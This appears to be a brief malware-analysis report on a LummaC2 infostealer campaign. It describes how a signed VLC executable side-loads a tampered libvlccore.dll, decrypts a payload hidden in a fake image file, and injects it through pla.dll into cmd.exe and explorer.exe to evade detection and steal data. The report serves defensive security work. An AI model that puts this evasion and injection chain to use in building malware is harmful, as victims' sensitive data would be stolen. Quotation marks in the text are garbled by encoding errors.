Malicious DLLs tweak part of legitimate DLLs as they decrypt and run data from a nearby file. Hiding data this way avoids altering DLL appearance, reducing detection risk.
For malware to work, the following elements are required to be placed in the same folder:-
Data
EXE
Modified DLL
Unzipping the password-protected file with the code â2023â gives you the following files:-
The following two files are genuine VLC files with valid signatures:-
Setup.exe
libvlc.dll
The âlibvlccore.dllâ is altered and lacks a matching signature, due to which the extra directories like demux and lua serve to mask its malicious nature.
Running âSetup.exeâ activates âlibvlccore.dll,â triggering a modified function that reads and decrypts âironwork.tiffâ in the same folder. This file holds code info. disguised as a PNG.
It loads âpla.dllâ from SysWow64 and injects code into its memory differently than typical malware. This method uses NTDLL relocation, and for âcmd.exe,â it loads âpla.dllâ and injects the malware into it.
A data file is written to %TEMP%. cmd.exe inherits it and has its EntryPoint changed to âpla.dllâ code. This code decrypts a file, generates LummaC2 malware, and runs âexplorer.exe,â injecting and executing the binary.
LummaC2 targets victims and installs malware from its C2 server, and it steals various sensitive data using JSON-formatted responses from C2.
The malware infects via legitimate EXE files, looking like original DLLs, posing a low detection risk.